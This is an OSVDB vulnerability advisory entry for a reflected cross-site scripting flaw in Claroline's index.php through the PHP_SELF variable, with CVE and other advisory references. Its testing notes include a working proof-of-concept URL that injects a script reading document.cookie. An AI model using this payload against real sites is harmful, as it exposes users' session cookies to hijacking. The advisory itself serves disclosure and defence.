Claroline index.php $_SERVER PHP_SELF Variable XSS

2007-03-11T00:00:00
ID OSVDB:36333
Type osvdb
Reporter Fernando Munoz()
Modified 2007-03-11T00:00:00

Description

Manual Testing Notes

http://[target]/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Secunia Advisory ID:25887 Related OSVDB ID: 36334 Other Advisory URL: http://www.claroline.net/forum/viewtopic.php?t=11920 FrSIRT Advisory: ADV-2007-2402 CVE-2007-3517 Bugtraq ID: 24742